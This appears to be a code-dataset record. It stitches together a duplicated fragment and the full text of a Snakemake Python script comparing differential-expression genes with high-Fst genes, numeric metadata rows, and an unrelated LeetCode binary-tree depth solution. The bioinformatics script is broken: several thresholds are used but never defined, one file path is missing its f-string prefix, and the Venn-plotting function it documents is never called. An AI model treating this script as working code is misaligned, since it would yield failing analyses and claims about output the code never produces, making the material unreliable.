comparisons = comparisons.contrast.str.split("_", expand=True)
comparisons = [list(row) for i,row in comparisons.iterrows()]
percentile = snakemake.params['percentile']
diffsnps = snakemake.params['diffsnps']
# Create a Pandas Excel writer using XlsxWriter as the engine.
writer = pd.ExcelWriter('results/RNA-Seq-full.xlsx', engine='xlsxwriter')
#### Differential expression v Fst venn diagram
for comp1,comp2 in comparisons:
name = comp1 + "_" + comp2
print(f"\n-------------- Venn Diagram for {name} --------------")
de = pd.read_csv(f"results/genediff/{name}.csv")
fst = pd.read_csv("results/variantAnalysis/selection/FstPerGene.tsv", sep="\t")
#compare sig DE genes and top 5% fst genes?
#get sig up and down diffexp genes
sigde = de[de['padj'] < pval_threshold]
sigde_up = sigde[sigde['FC'] > upper_fc]
sigde_down = sigde[sigde['FC'] < lower_fc]
#take top percentile of fst genes
highfst = fst.nlargest(int(fst.shape[0]*percentile),f"{name}_zFst")
#how many fst? how many sig de up and down?
nfst = highfst.shape[0]
nde_up = sigde_up.shape[0]
nde_down = sigde_down.shape[0]
print(f"There are {nde_up} significantly upregulated genes in {name}")
print(f"There are {nde_down} significantly downregulated genes in {name}")
nboth, _ = intersect2(sigde_up,
highfst,
de,
write=True,
path=f"results/venn/{name}.DE.Fst.intersection.tsv")
###### XLSX file ######
if diffsnps:
diffsnpsDE = pd.read_csv("results/diffsnps/{name}.sig.kissDE.tsv", sep="\t")
sheet = add_columns_xlsx(name, de, fst, highfst, diffsnps, diffsnpsDE)
else:
sheet = add_columns_xlsx(name, de, fst, highfst, diffsnps, diffsnpsDE=None)
# Write each dataframe to a different worksheet.
sheet.to_excel(writer, sheet_name=name)
# Close the Pandas Excel writer and output the Excel file.
writer.save() | 35.053097 | 118 | 0.666246 | #!/usr/bin/env python3
"""
A script to get the intersections of Differential expression results, Fst, and differential SNPs analysis.
Draws Venn diagrams and adds columns to RNA-seq-diff.xlsx, whether the gene has high Fst/PBS/diffsnps.
"""
import sys
sys.stderr = open(snakemake.log[0], "w")
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
from matplotlib_venn import *
import pandas as pd
import numpy as np
from pathlib import Path
def plotvenn2(name, group1, group2, nboth,stat="DE_PBS", group1name='Significant up DE genes', group2name='High PBS'):
print(f"There are {group2} high Fst genes in {name}")
print(f"There are {nboth} shared in {name}")
venn2(subsets = (group1, group2, nboth), set_labels = (group1name, group2name),
set_colors=('r', 'g'),
alpha = 0.5);
venn2_circles(subsets = (group1, group2, nboth))
plt.title(f"{name}")
plt.savefig(f"results/venn/{name}_{stat}.venn.png")
plt.close()
def intersect2(one, two, df, write=True, path=None):
inter = [x for x in list(one.GeneID) if x in list(two.GeneID)]
length = len(inter)
intersected_df = df[df.GeneID.isin(inter)]
intersected_df.to_csv(f"{path}", sep="\t")
return(length, intersected_df)
def add_columns_xlsx(name, de, fst, highfst, diffsnps, diffsnpsdf=None):
rnaxlsx = pd.read_excel("results/genediff/RNA-Seq_diff.xlsx",
sheet_name=name)
highfst_bool = de.GeneID.isin(highfst.GeneID).astype(str)
rnaxlsx['HighFst'] = highfst_bool
if diffsnps:
diffsnps_bool = de.GeneID.isin(diffsnpsdf.GeneID).astype(str)
rnaxlsx['DiffSNPs'] = diffsnps_bool
# add column of number of SNPs
merged = pd.merge(de, fst, how="outer")
rnaxlsx['nSNPs'] = merged['nSNPs']
return(rnaxlsx)
#### Main ####
# Read contrasts in and other snakemake params
comparisons = pd.DataFrame(snakemake.params['DEcontrasts'], columns=['contrast'])
comparisons = comparisons.contrast.str.split("_", expand=True)
comparisons = [list(row) for i,row in comparisons.iterrows()]
percentile = snakemake.params['percentile']
diffsnps = snakemake.params['diffsnps']
# Create a Pandas Excel writer using XlsxWriter as the engine.
writer = pd.ExcelWriter('results/RNA-Seq-full.xlsx', engine='xlsxwriter')
#### Differential expression v Fst venn diagram
for comp1,comp2 in comparisons:
name = comp1 + "_" + comp2
print(f"\n-------------- Venn Diagram for {name} --------------")
de = pd.read_csv(f"results/genediff/{name}.csv")
fst = pd.read_csv("results/variantAnalysis/selection/FstPerGene.tsv", sep="\t")
#compare sig DE genes and top 5% fst genes?
#get sig up and down diffexp genes
sigde = de[de['padj'] < pval_threshold]
sigde_up = sigde[sigde['FC'] > upper_fc]
sigde_down = sigde[sigde['FC'] < lower_fc]
#take top percentile of fst genes
highfst = fst.nlargest(int(fst.shape[0]*percentile),f"{name}_zFst")
#how many fst? how many sig de up and down?
nfst = highfst.shape[0]
nde_up = sigde_up.shape[0]
nde_down = sigde_down.shape[0]
print(f"There are {nde_up} significantly upregulated genes in {name}")
print(f"There are {nde_down} significantly downregulated genes in {name}")
nboth, _ = intersect2(sigde_up,
highfst,
de,
write=True,
path=f"results/venn/{name}.DE.Fst.intersection.tsv")
###### XLSX file ######
if diffsnps:
diffsnpsDE = pd.read_csv("results/diffsnps/{name}.sig.kissDE.tsv", sep="\t")
sheet = add_columns_xlsx(name, de, fst, highfst, diffsnps, diffsnpsDE)
else:
sheet = add_columns_xlsx(name, de, fst, highfst, diffsnps, diffsnpsDE=None)
# Write each dataframe to a different worksheet.
sheet.to_excel(writer, sheet_name=name)
# Close the Pandas Excel writer and output the Excel file.
writer.save() | 1,320 | 0 | 73 |
d9d99c47ac71fe23afdeb2996eb3a11528a72814 | 464 | py | Python | 104. Maximum Depth of Binary Tree.py | JazzikPeng/Algorithm-in-Python | 915135b1cdd02a6bb8d7068a54b2f497b2ec31d4 | [
"MIT"
] | 3 | 2018-02-05T06:15:57.000Z | 2019-04-07T23:33:07.000Z | 104. Maximum Depth of Binary Tree.py | JazzikPeng/Algorithm-in-Python | 915135b1cdd02a6bb8d7068a54b2f497b2ec31d4 | [
"MIT"
] | null | null | null | 104. Maximum Depth of Binary Tree.py | JazzikPeng/Algorithm-in-Python | 915135b1cdd02a6bb8d7068a54b2f497b2ec31d4 | [
"MIT"
] | null | null | null | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None | 24.421053 | 42 | 0.482759 | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
    def maxDepth(self, root):
        """Return the number of nodes on the longest root-to-leaf path.

        :type root: TreeNode
        :rtype: int
        """
        # an empty subtree has depth 0; otherwise the tree is one level
        # deeper than its deeper subtree
        if root is None:
            return 0
        deepest_subtree = max(self.maxDepth(root.left), self.maxDepth(root.right))
        return deepest_subtree + 1